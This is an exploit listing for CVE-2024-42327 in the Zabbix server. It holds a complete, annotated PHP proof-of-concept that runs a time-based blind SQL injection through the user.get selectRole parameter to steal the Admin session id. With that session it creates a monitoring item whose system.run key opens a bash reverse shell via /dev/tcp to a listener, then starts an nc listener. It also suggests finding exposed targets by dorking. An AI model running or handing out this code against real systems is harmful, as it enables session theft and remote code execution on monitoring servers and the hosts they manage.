## https://sploitus.com/exploit?id=PACKETSTORM:189549
=============================================================================================================================================
| # Title : Zabbix server v 7.0.1rc1 - CVE-2024-42327 time-based blind SQL injection (user.get selectRole) to RCE via item.create |
| # Author : indoushka |
| # Tested on : attacker host Windows 10 Fr (Pro), Firefox 135.0.1 (64-bit); the reverse-shell payload targets a Linux Zabbix agent (bash) |
| # Vendor : https://www.zabbix.com/ |
=============================================================================================================================================
POC :
[+] Discovery: find exposed Zabbix front-ends (api_jsonrpc.php) by dorking in Google or another search engine.
[+] Code Description:
The following code exploits CVE-2024-42327 (the title's "PHP Code Injection" is inaccurate: the script performs a SQL injection, not PHP injection). It logs in with the configured credentials, then abuses the `selectRole` parameter of the `user.get` API method for a time-based blind SQL injection that leaks, one character at a time, the active session id (status=0) of userid 1 (the built-in Admin account by default) from the `zabbix.sessions` table. With that session id it calls `host.get` and `item.create` to add a Zabbix-agent item whose `system.run[...]` key spawns a bash reverse shell to the listener.
Caveats a tester should check before running it: the Admin account must currently hold an active session or there is nothing to leak; the target agent must permit remote commands (system.run), otherwise the item is created but never executes; and the affected-version range should be verified against the vendor advisory rather than the version string in the title.
[+] Save the code as poc.php .
[+] Set target : edit `$zabbixUrl`, `$username`/`$password`, `$listenIp` and `$listenPort` in the configuration block at the end of the script (the line number quoted in the original advisory, 141, does not correspond to this listing).
[+] Usage : C:\www>php poc.php   (needs the PHP curl extension; the listener step shells out to `nc`, which must be on PATH)
[+] PayLoad :
<?php
// HTTP headers attached to every JSON-RPC request below. The helper
// functions read this array through $GLOBALS['headers'].
$headers = [
    'Content-Type: application/json',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36',
];
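/**
 * Log in to the Zabbix JSON-RPC API (user.login) and return the session token.
 *
 * @param string $url      Full URL of api_jsonrpc.php on the target.
 * @param string $username Zabbix user name. NOTE(review): the "username" request
 *                         field is what newer API versions expect; confirm against
 *                         the target release if login is rejected.
 * @param string $password Zabbix password.
 * @return string          The token from the "result" field of the API reply.
 *
 * Terminates the script (exit()) on a transport failure or when the API reply
 * carries no "result"; the raw reply is printed so the API error is visible.
 */
function zabbixAuthenticate($url, $username, $password)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "user.login",
        "params" => [
            "username" => $username,
            "password" => $password
        ],
        "id" => 1
    ]);
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
    // TLS certificate verification is disabled on purpose so self-signed lab
    // targets work; it also means the credentials can be intercepted by anyone
    // on the path, so only use this against hosts you control or are engaged on.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    $curlError = curl_error($ch);
    curl_close($ch);
    if ($response === false) {
        // Transport-level failure (DNS, refused connection, TLS handshake, ...).
        // The original fell through to json_decode(false) and reported it as a
        // login failure with an empty response, hiding the real cause.
        echo "[-] curl error: " . $curlError . "\n";
        exit();
    }
    $responseJson = json_decode($response, true);
    if (isset($responseJson['result'])) {
        echo "[+] تم تسجيل الدخول بنجاح! التوكن API: " . $responseJson['result'] . "\n";
        return $responseJson['result'];
    } else {
        echo "[-] فشل تسجيل الدخول. الاستجابة: " . $response . "\n";
        exit();
    }
}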
/**
 * Send one time-based blind SQL injection probe through user.get.
 *
 * The injected expression rides in the `selectRole` output list. The server
 * executes SLEEP($sleepTime - IF(match, 0, $sleepTime)): it sleeps $sleepTime
 * seconds when character $position of the selected session id equals $char and
 * 0 seconds otherwise. The caller tells the two cases apart by timing the call.
 *
 * @param string $url       api_jsonrpc.php URL.
 * @param string $authToken Session token of the logged-in user.
 * @param int    $position  Character index handed straight to MySQL MID(), i.e. 1-based.
 * @param string $char      Candidate character to test at that index.
 * @param int    $sleepTime Seconds the server sleeps on a match.
 * @param int    $row       Row of zabbix.sessions (userid=1, status=0) to read (LIMIT $row,1).
 * @return string|false     Raw HTTP response body, or false when curl fails.
 */
function sendInjection($url, $authToken, $position, $char, $sleepTime, $row)
{
    $probe = sprintf(
        'name AND (SELECT * FROM (SELECT(SLEEP(%s - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT %s,1), %s, 1))=%d, 0, %s)))))BEEF)',
        $sleepTime,
        $row,
        $position,
        ord($char),
        $sleepTime
    );
    $body = json_encode([
        "jsonrpc" => "2.0",
        "method" => "user.get",
        "params" => [
            "output" => ["userid", "username"],
            "selectRole" => ["roleid", $probe],
            "editable" => 1,
        ],
        "auth" => $authToken,
        "id" => 1
    ]);
    $handle = curl_init($url);
    curl_setopt_array($handle, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $body,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER => $GLOBALS['headers'],
        // Deliberately no TLS verification: lab targets with self-signed certs.
        CURLOPT_SSL_VERIFYPEER => false,
    ]);
    $reply = curl_exec($handle);
    curl_close($handle);
    return $reply;
}
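/**
 * Recover one character of the leaked session id by timing blind probes.
 *
 * Every candidate in $charset is sent through sendInjection(); the first one
 * whose round trip takes at least $sleepTime seconds is returned as the match.
 *
 * Bug fixed: the original took the last five bytes of the HTTP *body*
 * (substr($response, -5)) and compared them with $sleepTime as if they were a
 * duration, so it never measured time and could not recover any character.
 * The request is now timed with microtime().
 *
 * @param string $url       api_jsonrpc.php URL.
 * @param string $authToken Session token of the logged-in user.
 * @param int    $position  1-based index of the character to recover (MID() semantics).
 * @param string $charset   Candidate characters, tried in order.
 * @param int    $sleepTime Delay in seconds the probe induces on a match.
 * @return string|null      The matched character, or null when no candidate
 *                          matched (wrong charset, no session row, or the server
 *                          answered faster than $sleepTime for every candidate).
 */
function extractApiToken($url, $authToken, $position, $charset, $sleepTime)
{
    foreach (str_split($charset) as $char) {
        $started = microtime(true);
        // Only row 0 of the admin's active sessions is ever read.
        sendInjection($url, $authToken, $position, $char, $sleepTime, 0);
        $elapsed = microtime(true) - $started;
        // A match makes the server SLEEP($sleepTime); a miss returns at once.
        // Latency only adds to $elapsed, so no upper bound is applied — the
        // original's "< $sleepTime + 0.5" window would reject true matches on
        // slow links. Raise $sleepTime if the baseline round trip is close to it.
        if ($elapsed >= $sleepTime) {
            return $char;
        }
    }
    return null;
}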
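/**
 * List hosts with the leaked admin session and pick one that has an interface.
 *
 * Calls host.get with selectInterfaces and returns the first host carrying at
 * least one interface, because item.create needs both a hostid and an
 * interfaceid. The original always used result[0] and, when that host had no
 * interfaces, raised an undefined-index warning and returned a null interfaceid.
 *
 * NOTE(review): item.create below uses type 0 (Zabbix agent); this picks the
 * first interface of any type — confirm it is an agent interface on the target.
 *
 * @param string $url           api_jsonrpc.php URL.
 * @param string $apiTokenAdmin Session id recovered from zabbix.sessions.
 * @return array                [hostid, interfaceid], or [null, null] when the
 *                              call failed or no host with an interface came back.
 *                              An API "error" object (e.g. a truncated/invalid
 *                              session id) is printed instead of being mistaken
 *                              for "no hosts".
 */
function getHostIds($url, $apiTokenAdmin)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "host.get",
        "params" => [
            "output" => ["hostid", "host"],
            "selectInterfaces" => ["interfaceid"]
        ],
        "auth" => $apiTokenAdmin,
        "id" => 1
    ]);
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
    // Deliberately no TLS verification: lab targets with self-signed certs.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    $responseJson = ($response === false) ? null : json_decode($response, true);
    if (isset($responseJson['error'])) {
        echo "[-] host.get error: " . json_encode($responseJson['error']) . "\n";
        return [null, null];
    }
    foreach ($responseJson['result'] ?? [] as $host) {
        $interfaceId = $host['interfaces'][0]['interfaceid'] ?? null;
        if (isset($host['hostid']) && $interfaceId !== null) {
            return [$host['hostid'], $interfaceId];
        }
    }
    echo "[-] لم يتم العثور على أجهزة في الاستجابة.\n";
    return [null, null];
}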
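/**
 * Create a Zabbix-agent item on $hostId whose key runs a bash reverse shell.
 *
 * item.create with type 0 (Zabbix agent) and key system.run[bash -c "..."] makes
 * the agent execute the command on every poll (delay 1 second), so the
 * connection back to $listenIp:$listenPort is retried each second for as long
 * as the item exists. The item is NOT cleaned up by this script — delete it
 * (item.delete) after the engagement.
 *
 * Preconditions the script cannot verify: the host behind $interfaceId must run
 * a Linux agent with bash, and that agent must allow remote commands
 * (system.run is commonly disabled in agent configuration — confirm on the target).
 *
 * @param string $url           api_jsonrpc.php URL.
 * @param string $apiTokenAdmin Session id with rights to create items.
 * @param string $hostId        Target hostid from host.get.
 * @param string $interfaceId   Interface id on that host.
 * @param string $listenIp      IP or resolvable hostname the *target* can reach.
 *                              It is pasted into /dev/tcp/<ip>/<port>, so an
 *                              interface name such as "tun0" will not work.
 * @param int    $listenPort    Listener port.
 * @return void  The API reply is now inspected: an "error" object is printed,
 *               since the original discarded the reply and a rejected
 *               item.create (duplicate key, wrong interface, ...) looked like success.
 */
function sendReverseShellRequest($url, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "item.create",
        "params" => [
            "name" => "rce",
            "key_" => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]",
            "delay" => 1,
            "hostid" => $hostId,
            "type" => 0,
            "value_type" => 1,
            "interfaceid" => $interfaceId,
        ],
        "auth" => $apiTokenAdmin,
        "id" => 1
    ]);
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
    // Deliberately no TLS verification: lab targets with self-signed certs.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    if ($response === false) {
        echo "[-] item.create: transport error, no reply from the API\n";
        return;
    }
    $responseJson = json_decode($response, true);
    if (isset($responseJson['error'])) {
        echo "[-] item.create error: " . json_encode($responseJson['error']) . "\n";
    } else {
        echo "[+] item.create accepted: " . $response . "\n";
    }
}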
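// ---- configuration ---------------------------------------------------------
$zabbixUrl = "http://example.com/api_jsonrpc.php";   // target API endpoint
$username = "admin";                                  // any account the API lets call user.get
$password = "admin";
// Address the *target agent* connects back to. It ends up in
// /dev/tcp/<ip>/<port>, so it must be an IP address or resolvable hostname;
// an interface name such as "tun0" is not resolved — replace it with your IP.
$listenIp = "tun0";
$listenPort = 4444;
$sleepTime = 1;   // seconds the probe sleeps on a match; raise it on slow links
$row = 0;         // reserved: extractApiToken() currently always reads row 0
$length = 32;     // number of session-id characters to recover
// Candidate characters, tried in this order for every position. NOTE(review):
// if the session id is hex-only, "0123456789abcdef" would be ~4x faster — confirm
// the format on the target before shrinking the set.
$charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
// ---- run -------------------------------------------------------------------
$apiToken = zabbixAuthenticate($zabbixUrl, $username, $password);
$apiTokenAdmin = '';
// MySQL MID() is 1-based, so positions run 1..$length. The original looped
// 0..$length-1: MID(...,0,1) yields '' and never matches, and the last
// character was never requested.
for ($position = 1; $position <= $length; $position++) {
    $char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime);
    if ($char === null) {
        // A missed character shifts every later one, leaving a useless session
        // id; stop here instead of carrying on with a truncated token.
        echo "\n[-] no character matched at position " . $position . " (recovered so far: '" . $apiTokenAdmin . "'); try a larger \$sleepTime\n";
        exit(1);
    }
    $apiTokenAdmin .= $char;
    echo "\r[*] استخراج التوكن API للمسؤول: " . $apiTokenAdmin;
    flush();
}
echo "\n[*] الحصول على معرّفات الأجهزة ...\n";
list($hostId, $interfaceId) = getHostIds($zabbixUrl, $apiTokenAdmin);
if ($hostId && $interfaceId) {
    echo "[*] بدء الاستماع وإرسال الـ reverse shell ...\n";
    sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort);
    // passthru() leaves stdin/stdout attached to the terminal so the shell is
    // usable; the original shell_exec() buffered nc's output until nc exited.
    // The item polls every second, so starting the listener after item.create
    // is fine. $listenPort is cast to int so only a number reaches the shell.
    passthru("nc -lnvp " . (int) $listenPort);
} else {
    echo "[-] فشل الحصول على معرّف الجهاز أو الواجهة.\n";
}
?>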
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================